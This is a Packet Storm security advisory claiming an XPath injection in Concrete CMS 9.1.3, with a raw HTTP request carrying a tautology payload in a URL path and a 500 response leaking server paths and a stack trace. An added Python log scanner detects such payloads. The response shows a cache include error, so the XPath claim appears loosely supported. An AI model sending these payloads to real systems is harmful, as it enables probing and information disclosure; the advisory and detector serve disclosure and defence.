PACKETSTORM:170041

Concrete CMS 9.1.3 XPATH Injection

2022-11-29 00:00:00
nu11secur1ty
packetstormsecurity.com
## Title: concretecms-9.1.3 Xpath injection  
## Author: nu11secur1ty  
## Date: 11.28.2022  
## Vendor: https://www.concretecms.org/  
## Software: https://www.concretecms.org/download  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3  
  
## Description:  
The URL path folder `3` appears to be vulnerable to XPath injection attacks.  
The test payload `50539478' or 4591=4591--` was submitted in the URL path folder `3`, and an XPath error message was returned.  
An attacker can flood the system with requests through this vulnerability until he receives the actual paths of all the content of this system, whether that content is stored on an internal or external server.  
  
## STATUS: HIGH Vulnerability  
  
[+] Exploits:  
00:  
```http
GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
Content-Length: 0  
```  
  
[+] Response:  
  
```HTTP  
HTTP/1.1 500 Internal Server Error  
Date: Mon, 28 Nov 2022 15:32:22 GMT  
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30  
X-Powered-By: PHP/7.4.30  
Connection: close  
Content-Type: text/html;charset=UTF-8  
Content-Length: 592153  
  
<!DOCTYPE html><!--  
  
  
Whoops\Exception\ErrorException: include(): Failed opening  
'C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php'  
for inclusion (include_path='C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR')  
in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php  
on line 26  
Stack trace:  
1. Whoops\Exception\ErrorException->()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26  
2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26  
3. Stash\Driver\FileSystem\NativeEncoder->deserialize()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201  
4. Stash\Driver\FileSystem->getData()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631  
5. Stash\Item->getRecord()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321  
6. Stash\Item->executeGet()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252  
7. Stash\Item->get()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346  
8. Stash\Item->isMiss()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67  
9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356  
10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601  
11. Laminas\I18n\Translator\Translator->loadMessages()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434  
12. Laminas\I18n\Translator\Translator->getTranslatedMessage()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349  
13. Laminas\I18n\Translator\Translator->translate()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69  
14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27  
15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47  
16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267  
17. Concrete\Core\Block\View\BlockView->renderViewContents()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164  
18. Concrete\Core\View\AbstractView->render()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853  
19. Concrete\Core\Area\Area->display()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128  
20. Concrete\Core\Area\GlobalArea->display()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11  
21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125  
22. Concrete\Core\View\View->inc()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4  
23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329  
24. Concrete\Core\View\View->renderTemplate()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291  
25. Concrete\Core\View\View->renderViewContents()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164  
26. Concrete\Core\View\AbstractView->render()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19  
27. Concrete\Controller\SinglePage\PageNotFound->view()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318  
28. call_user_func_array()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318  
29. Concrete\Core\Controller\AbstractController->runAction()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188  
30. Concrete\Core\Http\ResponseFactory->controller()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95  
31. Concrete\Core\Http\ResponseFactory->notFound()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390  
32. Concrete\Core\Http\ResponseFactory->collectionNotFound()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234  
33. Concrete\Core\Http\ResponseFactory->collection()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132  
34. Concrete\Core\Http\DefaultDispatcher->handleDispatch()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60  
35. Concrete\Core\Http\DefaultDispatcher->dispatch()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39  
36. Concrete\Core\Http\Middleware\DispatcherDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39  
37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36  
39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36  
41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35  
43. Concrete\Core\Http\Middleware\CookieMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29  
45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86  
47. Concrete\Core\Http\Middleware\MiddlewareStack->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85  
48. Concrete\Core\Http\DefaultServer->handleRequest()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125  
49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102  
50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45  
51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2  
  
  
--><html>  
<head>  
<meta charset="utf-8">  
<meta name="robots" content="noindex,nofollow"/>  
<meta name="viewport" content="width=device-width,  
initial-scale=1, shrink-to-fit=no"/>  
<title>Concrete CMS has encountered an issue.</title>  
  
<style>body {  
font: 12px "Helvetica Neue", helvetica, arial, sans-serif;  
color: #131313;  
background: #eeeeee;  
padding:0;  
margin: 0;  
max-height: 100%;  
  
text-rendering: optimizeLegibility;  
}  
a {  
text-decoration: none;  
}  
  
.Whoops.container {  
position: relative;  
z-index: 9999999999;  
}  
  
.panel {  
overflow-y: scroll;  
height: 100%;  
position: fixed;  
margin: 0;  
left: 0;  
top: 0;  
}  
  
.branding {  
position: absolute;  
top: 10px;  
right: 20px;  
color: #777777;  
font-size: 10px;  
z-index: 100;  
}  
.branding a {  
color: #e95353;  
}  
  
header {  
color: white;  
box-sizing: border-box;  
background-color: #2a2a2a;  
padding: 35px 40px;  
max-height: 180px;  
overflow: hidden;  
transition: 0.5s;  
}  
  
header.header-expand {  
max-height: 1000px;  
}  
  
.exc-title {  
margin: 0;  
color: #bebebe;  
font-size: 14px;  
}  
.exc-title-primary, .exc-title-secondary {  
color: #e95353;  
}  
  
.exc-message {  
font-size: 20px;  
word-wrap: break-word;  
margin: 4px 0 0 0;  
color: white;  
}  
.exc-message span {  
display: block;  
}  
.exc-message-empty-notice {  
color: #a29d9d;  
font-weight: 300;  
}  
  
.......  
  
```  
  
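The request above carries a quoted boolean tautology in a URL path segment and draws a 500. The following detection script is an added example, not part of the advisory or of Concrete CMS: it parses Apache-style access-log lines (constructed samples, documentation IPs; the first reuses the advisory's request path), decodes each path segment and flags the quote, `or n=n`, comment-terminator shape, marking hits that also produced a 5xx so the response-side symptom is visible in the same finding.

```python
import re
from urllib.parse import unquote

# Apache common/combined log prefix: ip ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Quote, boolean operator, numeric tautology (n=n), comment terminator or end of
# segment: the shape of the path payload in the advisory. Applied to decoded text.
TAUTOLOGY_RE = re.compile(
    r"""['"]\s*(?:or|and)\s+(\d+)\s*=\s*\1\s*(?:--|#|$)""", re.IGNORECASE
)

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def suspicious_segments(path):
    """Return the URL-decoded path segments that carry a quote+tautology payload."""
    decoded = unquote(path.split("?", 1)[0])  # query string is out of scope here
    return [seg for seg in decoded.split("/") if TAUTOLOGY_RE.search(seg)]

def scan(lines):
    """Flag probe requests; 'error' marks the ones that also produced a 5xx."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        segs = suspicious_segments(rec["path"])
        if segs:
            findings.append({"ip": rec["ip"], "status": rec["status"],
                             "segments": segs, "error": rec["status"] >= 500})
    return findings

# Constructed sample log lines (not from the advisory's target); line 1 reuses the advisory's path.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Nov/2022:15:32:22 +0000] "GET /concrete-cms-9.1.3/index.php/ccm50539478\'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1" 500 592153',
    '198.51.100.4 - - [28/Nov/2022:15:33:01 +0000] "GET /concrete-cms-9.1.3/index.php/about-us HTTP/1.1" 200 14311',
    '198.51.100.4 - - [28/Nov/2022:15:33:05 +0000] "GET /blog/it\'s-here HTTP/1.1" 200 9020',
    '203.0.113.7 - - [28/Nov/2022:15:34:10 +0000] "GET /index.php/ccm1\'%20or%207%3d7--%20/x HTTP/1.1" 404 2048',
]
```

A plain apostrophe in a slug (the third sample) is not flagged because the pattern requires the operator and the `n=n` comparison after the quote.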
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)  
  
## Proof and Exploit:  
[href](https://streamable.com/4f60ka)  
  
## Time spent  
`03:00:00`  
  